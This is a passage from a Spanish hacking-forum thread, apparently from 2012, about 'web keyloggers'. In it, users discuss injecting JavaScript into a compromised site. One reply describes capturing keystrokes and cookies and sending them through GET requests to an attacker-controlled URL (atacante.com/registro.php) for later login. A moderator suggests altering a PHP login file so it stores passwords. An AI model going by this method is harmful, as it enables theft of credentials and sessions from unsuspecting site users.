elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web (Moderador: #!drvy)
| | |-+  ¿Keylogger web?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: ¿Keylogger web?  (Leído 8,368 veces)
Luna71c0


Desconectado Desconectado

Mensajes: 541


El lado oscuro de la luna...


Ver Perfil
Re: ¿Keylogger web?
« Respuesta #10 en: 23 Agosto 2012, 19:42 pm »

Hola.

No entiendo. La idea (no la del post, imagino  :xD, sino la del artículo enlazado) es colarlo en un servidor legítimo, para robo de credenciales; como alternativa a phising.

Saludos.
por eso mismo, te llevaria muchos problemas legales :P


En línea


Citar
Un pequeño paso para el programador....
Un gran paso para el hacker...

...]LunaHAck[...


i'm the "Luna71c0"
USLO

Desconectado Desconectado

Mensajes: 175

Programador(C#,Vb.net,Asp.Net,JavaAndroid)


Ver Perfil
Re: ¿Keylogger web?
« Respuesta #11 en: 24 Agosto 2012, 11:09 am »

No lo entinedo referente al enlace que nos has mandado no entinedo esto!

Código:
De esta forma, con que un  ciberdelincuente pueda inyectar el código en un sitio web, sería capaz de obtener credenciales.



Que  alguine me explique esto de inyectar en un sitio WEB.
Osea cojes el sitio WEB de otro y le mtes tu JS?

No le veo sentido.

No lo veo plausible en la mayoria de los casos.
Si me equivoco , aclararmelo que me interesa este tema.  >:D

Saludos


En línea

#!drvy
Moderador
***
Desconectado Desconectado

Mensajes: 5.850



Ver Perfil WWW
Re: ¿Keylogger web?
« Respuesta #12 en: 24 Agosto 2012, 11:27 am »

Citar
Que  alguine me explique esto de inyectar en un sitio WEB.
Osea cojes el sitio WEB de otro y le mtes tu JS?
Exacto, el atacante debe tener acceso al servidor.. ya sea mediante una vulnerabilidad o cualquier otra cosa... con tal de que pueda inyectar una linea de js le sirve..

Citar
reitero no le encuentro sentido, prefiero plantar un keylogger y listo xD
El keylogger tambien te lleva a muchos problemas legales =) y ademas si plantas un keylogger en una web... te llevas credenciales de usuarios que nunca has llegado a conocer...

Claro que esto de hacer un keylogger en javascript es un rollo... si tienes acceso a los archivos (te vale con el de login) puedes modificar el PHP para que te almacene las claves y así todo es un poco mas "invisible" para la victima..

Saludos
En línea

h3ct0r

Desconectado Desconectado

Mensajes: 108


Hail to the king baby!


Ver Perfil
Re: ¿Keylogger web?
« Respuesta #13 en: 24 Agosto 2012, 22:44 pm »

Creo que si se podría, en realidad suena bastante interesante como un POC.

Bueno en lineas generales creo que podrías hacerlo de la siguiente manera, no lo he probado así que puedo estar equivocado:

En teoría tendrías 2 sitios, http://www.victima.com/index.php y http://www.atacante.com .
Si tienes privilegios para escribir un archivo, puedes editar index.php en la pagina victima e insertar un javascript malicioso que haga lo siguiente:

Leer cada tecla pulsada por el teclado + la cookie y crear en cada keypress una imagen en el dom o un iframe que apunte hacia http://www.atacante.com/registro.php?cookie=123&keypress=E&dominio=victima.com (le pasas los datos que robas a través de una petición get y así haces bypass del filtro de seguridad de los navegadores).
Luego cada vez que registro.php reciba una peticion get, colocas esa información en una base de datos para luego trabajarlas y mostrarlas todas juntas por dominio y cookie (así sabes que las teclas pulsadas son de una persona en especifico de un sitio en especifico, ademas de que te permite loguearte después, tanto con la contraseña que saques, como por la cookie robada).

Esta bastante interesante la idea, si tuviera un poco mas de tiempo me gustaría desarrollarla por que le veo mucho potencial.  ;D

Por ahi hay un proyecto de javascript y perl que trojaniza por completo el navegador del usuario pero ahora no me acuerdo del nombre!
En línea

[img[/img]
Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines